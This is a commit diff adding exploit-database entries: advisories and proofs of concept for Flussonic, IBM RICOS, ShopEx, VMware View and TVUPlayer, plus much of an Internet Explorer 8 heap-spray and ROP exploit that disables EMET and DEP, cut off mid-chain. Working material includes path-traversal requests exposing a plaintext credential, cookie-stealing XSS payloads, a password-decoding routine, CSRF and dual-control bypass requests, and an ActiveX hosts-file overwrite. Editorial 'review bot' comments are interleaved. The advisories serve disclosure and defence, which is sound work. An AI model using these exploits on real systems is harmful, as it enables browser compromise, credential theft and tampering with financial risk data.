Updated 07_03_2014

Offensive Security 2014-07-03 04:38:30 +00:00
parent ff9d2bfa96
commit aa77b5b1c1
7 changed files with 865 additions and 0 deletions


@ -30564,3 +30564,9 @@ id,file,description,date,author,platform,type,port
33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access Vulnerability",2010-02-24,nks,windows,remote,0
33937,platforms/multiple/webapps/33937.txt,"TYPO3 't3m_cumulus_tagcloud' Extension 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,multiple,webapps,0
33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Vulnerability",2010-02-04,"Karn Ganeshen",hardware,remote,0
33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 'errinfo' Parameter Cross Site Scripting Vulnerability",2010-02-06,"cp77fk4r ",java,webapps,0
33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x URL Processing Cross-site Scripting Vulnerability",2010-05-05,"Alexey Sintsov",multiple,remote,0
33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite Vulnerability.",2010-02-03,"Evdokimov Dmitriy",windows,remote,0
33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80
33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080
33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass",2014-07-01,sickness,windows,remote,0
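Review bot: the 33943 row misclassifies the Flussonic advisory it indexes: the type column says `dos` and the platform `aix`, while the advisory (platforms/aix/dos/33943.txt) describes an unauthenticated arbitrary file read plus an authenticated directory listing on an Erlang-based streaming server, so `remote` under `multiple` (or `linux`) would match the content, and the title's "Aribtrary" should read "Arbitrary". The 33941 row also disagrees with its PoC file on the version: the index says TVUPlayer 2.4.4.9beta1, the file says 2.4.9beta1 [build1797]; one of the two should be corrected so searches by version hit the right entry.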


platforms/aix/dos/33943.txt (executable file)

@ -0,0 +1,133 @@
Document Title:
============
Flussonic Media Server 4.3.3 Multiple Vulnerabilities
Release Date:
===========
June 29, 2014
Product & Service Introduction:
========================
Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).
Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.
Abstract Advisory Information:
=======================
BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3
Vulnerability Disclosure Timeline:
=========================
June 26, 2014 : Contact with Vendor
June 26, 2014 : Vendor Response
June 26, 2014 : Version 4.3.4 Deployed
June 29, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3
Exploitation Technique:
==================
AFR: Remote, Unauthenticated
ADL: Remote, Authenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Arbitrary File Read (Unauthenticated)
Its possible to read any files from the server (with the applications users permissions) by a simple HTTP GET request. Flussonics web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, its possible to login any Flussonic web interface using that method.
2. Arbitrary Directory Listing (Authenticated)
Its possible to list any directories content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
Proof of Concept (PoC):
==================
Proof of Concept AFR Request & Response:
GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 09:50:57 GMT
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687
# Default ports Flussonic M1 Media server listens on
http 80;
http 8080;
rtmp 1935;
rtsp 554;
pulsedb /var/run/flussonic;
edit_auth flussonic letmein!;
live mylive;
file vod {
path priv;
}
2. Proof of Concept ADR Request & Response:
GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 11:04:12 GMT
Content-Length: 7555
X-Route-Time: 28
X-Run-Time: 8090
Content-Type: application/json
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
………
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
Solution Fix & Patch:
================
Update version 4.3.4
Security Risk:
==========
The risk of the vulnerabilities above estimated as high and medium.
Credits & Authors:
==============
Bilgi Güvenliði Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: http://bga.com.tr/advisories.html
Social: http://twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA
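Review bot: the PoC labels do not line up with the rest of the advisory: the first PoC heading ("Proof of Concept AFR Request & Response") lacks the "1." that the second one has, and the second is titled "ADR" while the abstract and the Exploitation Technique section call the issue ADL (Arbitrary Directory Listing); "Its possible" should read "It's possible" in both technical descriptions. Severity is also self-contradictory: "Severity Level: High" versus "estimated as high and medium" under Security Risk; saying that the unauthenticated file read is high and the authenticated listing is medium would reconcile the two. Worth spelling out for defenders is the chain the two requests already show: `GET /../../../etc/flussonic/flussonic.conf` returns the config whose `edit_auth flussonic letmein!;` line is exactly the credential pair carried in the second request's `Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h` header, so a deployment that ran a 4.1.25 - 4.3.3 build should rotate its `edit_auth` credentials after moving to 4.3.4, not only upgrade.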


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39941/info
ShopEx Single is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ShopEx Single 4.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg==
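Review bot: the PoC URL carries both parameters base64 encoded (`gOo=ZXJyb3IuZHd0` is `error.dwt`, `errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg==` is `<script>alert("XSSED")</script>`), but the text never says that the application base64-decodes `errinfo` before placing it in the error template; one sentence stating that would explain why a filter that inspects the raw query string for `<script>` sees nothing here, and why output encoding has to be applied after the decode step rather than on the incoming parameter.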

platforms/jsp/webapps/33942.txt (executable file)

@ -0,0 +1,361 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20140630-0 >
=======================================================================
title: Multiple severe vulnerabilities
product: IBM Algorithmics RICOS
vulnerable version: 4.5.0 - 4.7.0
fixed version: 4.7.0.03
CVE number: CVE-2014-0894
CVE-2014-0871
CVE-2014-0870
CVE-2014-0869
CVE-2014-0868
CVE-2014-0867
CVE-2014-0866
CVE-2014-0865
CVE-2014-0864
impact: critical
homepage: http://www-01.ibm.com/software/analytics/algorithmics/
found: 2013-12-19
by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
- -------------------
IBM Algorithmics software enables financial institutions and corporate
treasuries to make risk-aware business decisions. Supported by a global
team of risk experts based in all major financial centers, IBM
Algorithmics solution offerings include market, credit and liquidity risk,
as well as collateral and capital management.
Source: http://www-01.ibm.com/software/analytics/algorithmics/
RICOS is a pre-deal limit management solution part of the Algo Suite.
Business recommendation:
- ------------------------
The identified vulnerabilities affect integrity and confidentiality of the
risk management system. SEC Consult does not recommend to rely on RICOS as
part of risk management until a thorough security review has been performed
by security professionals. As a workaround, access should be limited only to
trusted users internally and sample checks regarding the plausibility of limits
should be performed manually.
Vulnerability overview/description:
- -----------------------------------
1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)
The Tomcat configuration discloses technical details within error messages to
the user, which allows an attacker to collect valuable data about the
environment of the solution.
2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)
The password and the username of the backend database are disclosed in
clear-text to the user of the web application. This allows attackers to
directly connect to the backend database and manipulate arbitrary data stored
in the database (e.g. limits).
3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)
Several parameters in the RICOS web front end and the Blotter are not properly
sanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal
user sessions and impersonate other users while performing arbitrary actions
on behalf of the victim user.
4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)
Weak cryptographic algorithms, being used to store and transfer
user's passwords, allow an attacker to retrieve the plain-text passwords
without further knowledge of cryptographic keys.
5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /
CVSS 3.5)
Several fields of stored data within RICOS are marked as read-only in the web
application, disallowing modification of certain fields. These checks are only
performed client-side, allowing an attacker to alter arbitrary data. An
attacker can create a limit, alter the username of the created limit and
confirm the limit himself, circumventing dual control mechanisms advertised by
RICOS.
6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)
A vulnerable page in RICOS allows an attacker to set and overwrite arbitrary
cookies for a user that clicks on a manipulated link.
7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)
The RICOS fat client submits user credentials in plain-text. An attacker with
access to the network communication can perform man-in-the-middle attacks and
steal user credentials.
This vulnerability also applies to the Blotter, where authentication is
performed unencrypted.
8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)
The RICOS fat client performs input validation only client-side. This allows
an attacker to alter arbitrary data. An attacker can create a limit, alter
the username of the created limit and confirm the limit himself, circumventing
dual control mechanisms advertised by RICOS.
9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)
The web application does not verify that requests are made only from within
the web application, allowing an attacker to trick users into performing
requests to the web application. This allows an attacker to perform tasks on
behalf of the victim user like modifying limits.
Proof of concept:
- -----------------
1) Information Disclosure
The following URL causes a status 404, disclosing the Tomcat version:
https://ricos/ricos470/classes/
If control characters (i.e. \x00) are sent as part of the cookie, a stack trace
is triggered
2) Password Disclosure
The following request sent by the client during regular communication shows the
database connection settings including the username and the password in
clear-text.
POST /ricos470/Executer HTTP/1.1
Host: ricos
...SNIP...
<i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i
n="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t
n="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port"
v="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i
n="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i
n="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass"
v="password"/>
...SNIP...
3) Non-permanent Cross-Site Scripting
The following URLs demonstrate Cross-Site Scripting vulnerabilities:
POST /ricos470/rcore6/main/showerror.jsp HTTP/1.1
Host: ricos
Message=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....
https://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x
https://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//
http://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y
http://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>
4) Broken Encryption
The user's password is transported frequently in requests within the application.
The following function decrypts the password without requiring any cryptographic key:
public static void decrypt(String string)
{
int nRadix = 32;
int nR2 = nRadix * nRadix / 2;
GregorianCalendar cal = new GregorianCalendar();
String key = string.substring(0, 2);
int nKey = Integer.parseInt(key, 32);
String encPw = string.substring(2, string.length());
int y = 0;
for (int i = 0; i < encPw.length(); i+=2)
{
String aktuell = encPw.substring(i,i+2);
int new_value = Integer.parseInt(aktuell, 32);
int character = - nKey * (y + 1) % nR2 + new_value;
char decrypt = (char) character;
System.out.print(decrypt);
y = y + 1;
}
}
5) Manipulation of read-only data / dual control mechanism bypass
The following example illustrates how to manipulate a request so that the server
saves it on behalf of another user (only the relevant parts are shown):
<?xml version="1.0" encoding="UTF-8"?>
<ds>
<t n="Service">
<i n="RequestType" v="#Action"/>
<t n="#ActionData">
<i n="#ActionName" v="web.getmeta_udf"/>
<i n="#Mode" v="#Sync"/>
<i n="#Request" v="#Execute"/>
<t n="#OutputData">
<t n="#MapTable">
<i n="#ResultData" v="#ResultData"/>
<i n="#ResultTable" v="#ResultTable"/>
</t>
</t>
<t n="#InputData">
<t n="#WorkTable">
<t n="det_limit">
<i n="SCTYGEID" v="A"/>
[...]
<i n="LMLCURID" v="other_user"/>
<i n="LMEQEPSTDA" v=""/>
[...]
<i n="MFURID" v="other_user"/>
<i n="LMEVFL" v="N"/>
<i n="SOLMFL" v="N"/>
[...]
<i n="CRURID" v="other_user"/>
<i n="MFTS" v=""/>
<i n="MFURID" v="other_user"/>
[...]
<i n="CRURID" v="other_user"/>
<i n="MFTS" v=""/>
[...]
</t>
<t n="Session">
<t n="SessionData">
<i n="LoginUser" v="other_user"/>
<i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>
[...]
<i n="LoginUser v="other_user"/>
<i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>
<i n="URN" v=""/>
<i n="SecServiceURN" v="obsv2:ricos:20100"/>
[...]
</t>
<t n="ObServer">
<i n="UserId" v="other_user"/>
<i n="Password" v=""/>
<i n="Host" v="ricos"/>
[...]
<i n="Prefix" v="RICA"/>
<i n="DbSystem" v="oracle"/>
<i n="LoginUserId" v="other_user"/>
</t>
</t>
</t>
</ds>
6) Cross-Site Cookie Setting
The following URL allows setting of arbitrary cookies:
https://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content
7) Plain-text submission of passwords
Neither the fat client nor the Blotter use https to communicate with the
backend server. Both send unencrypted credentials via http during authentication.
8) Client-side Input Validation
By manipulating serialized objects that are transmitted by the fat client,
it is possible to change the user name who created a limit, allowing an attacker
to bypass dual control mechanisms.
9) Cross-Site Request Forgery
The following request, sent on behalf of an authenticated user will e.g.
change the currency of a given deal:
POST http://ricos/ricos470/Executer HTTP/1.1
Host: ricos
<?xml version="1.0" encoding="UTF-8"?>
<ds>
<t n="Service">
<i n="RequestType" v="#Action"/>
<t n="#ActionData">
<i n="#ActionName" v="web.updrec_msp"/>
<i n="#Mode" v="#Sync"/>
<i n="#Request" v="#Execute"/>
<t n="#InputData">
<t n="#MapTable">
<i n="#InputData" v="det_msp"/>
</t>
<t n="#WorkTable">
<t n="det_msp">
<i n="SYPMID" v="SYS-PAR-ID"/>
<i n="CUCD" v="USD"/>
<i n="MIGORILV" v="11"/>
<i n="ILPLMVFL" v="Y"/>
<i n="ILNEMVFL" v="Y"/>
<i n="BSCUONFL" v="N"/>
<i n="PBSCUOFL" v="N"/>
<i n="LORICUTEFL" v="N"/>
<i n="SYSAVAILFL" v="F"/>
<i n="CUSTID" v="CUSTOMER"/>
<i n="CBNALI" v="IS-LOCATED-IN"/>
<i n="CBNAAG" v="AUTOMATIC-GROUP"/>
<i n="UDF1" v="Welcome to ricos 4.71"/>
</t>
...SNIP...
Vulnerable / tested versions:
- -----------------------------
IBM Algorithmics RICOS 4.71
Vendor contact timeline:
- ------------------------
2014-01-24: Contacting vendor through psirt@vnet.ibm.com
2014-01-24: Vendor response, will likely require more than 30 days to resolve issues
asking for acknowledgements
2014-01-24: Sending acknowledgements
2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues
2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS
2014-02-10: Providing further information on assumed to be false positive issue 1441
2014-02-14: Telco to clarify vulnerability details and agree on further procedure
patches are scheduled for end of June 2014
2014-02-20: Vendor confirms issue 1441 to be a vulnerability
2014-05-27: Vendor announces that patches will be released on 2014-06-30
2014-06-26: Vendor published patches and security bulletin
https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881
2014-06-30: SEC Consult publishes the advisory
Solution:
- ---------
Apply patch ACLM 4.7.0.03 FP5. More information:
https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881
Workaround:
- -----------
Limit access to RICOS and manually perform sample checks regarding the
plausibility of limits.
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF F. Lukavsky / @2014
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
-----END PGP SIGNATURE-----
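Review bot: the `decrypt` routine under 4) does not compile or return anything as pasted: it needs `import java.util.GregorianCalendar;` (or, better, the never-used `cal` should be dropped), and it prints each character with `System.out.print` instead of building and returning a `String`; the `aktuell` identifier is German for "current" and should be renamed. The point the section should make explicitly is that the two-character radix-32 `key` is taken from the transmitted string itself (`string.substring(0, 2)`), so the scheme is keyless obfuscation rather than encryption, which is what justifies CVE-2014-0869. In section 5 the line `<i n="LoginUser v="other_user"/>` is missing the closing quote after `LoginUser`. The "Vulnerable / tested versions" block says `4.71` while the header gives `4.5.0 - 4.7.0` and the fix as `4.7.0.03`; `4.7.1` or `4.7.0` is presumably meant. Finally, the `- -` prefixes on every section rule are PGP clearsign dash-escaping; once the advisory is stored as a plain file (and the signature can no longer verify against an edited copy) they should be unescaped back to `-----`.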


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39949/info
VMware View is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects VMware View versions prior to 3.1.3.
http://www.example.com/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT>
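Review bot: the payload sits in the path (`/not_a_real_page<SCRIPT>alert(/XSS/.source)</SCRIPT>`) rather than in a parameter, which means the reflection point is the server's error page echoing the requested URL unencoded; the file should state that, since it tells a defender which template to fix (and that "versions prior to 3.1.3" marks where VMware did so). A short note that `/XSS/.source` is used to avoid quote characters would also help readers who try to reason about which characters the sink filters.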


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/39956/info
TVUPlayer ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application, typically Internet Explorer, using the ActiveX control.
TVUPlayer 2.4.9beta1 [build1797] is vulnerable; other versions may be affected.
<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8' id='target' /> <script language='vbscript'> 'File Generated by COMRaider v0.0.133 - http://labs.idefense.com 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:\Program Files\Online TV Player 4\PlayerOcx.ocx" prototype = "Property Let LangFileName As String" memberName = "LangFileName" progid = "PlayerOcx.FormPlayer" argCount = 1 arg1="C:\WINDOWS\system32\drivers\etc\hosts" target.LangFileName = arg1 </script></job></package>
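Review bot: the whole `.html` PoC has been collapsed onto one line, so the VBScript comments (`'File Generated by COMRaider ...`, `'Wscript.echo typename(target) 'for debugging/custom prolog`) now swallow the statements that follow them; the line breaks must be restored or the `<script>` section is not readable as code. Content-wise, the description should name the root cause visible in the PoC: the `LangFileName` property of PlayerOcx.ocx (CLSID 18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8) accepts an arbitrary path and the control is instantiable from a web page, so until a fixed build exists the defensive action is to set the kill bit for that CLSID (Compatibility Flags 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility) rather than to rely on the browser's zone settings.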


@ -0,0 +1,340 @@
<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass
** Offensive Security Research Team
** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
<script language='javascript'>
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5036248; // ADD ESP,0C
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET
var getprocaddr = cbuttonlayout + 4836; // GetProcAddress
var getprocaddr = getprocaddr.toString(16);
var getprocaddr1 = getprocaddr.substring(4,8);
var getprocaddr2 = getprocaddr.substring(0,4); // } RET
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141"); // PADDING
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
// EMET disable part 0x01
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u101C%u076d"); // EMET string
shellcode+= unescape("%ue220%u0007"); // EMET offset
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // Zero out ECX
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
// EMET disable part 0x01 end
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
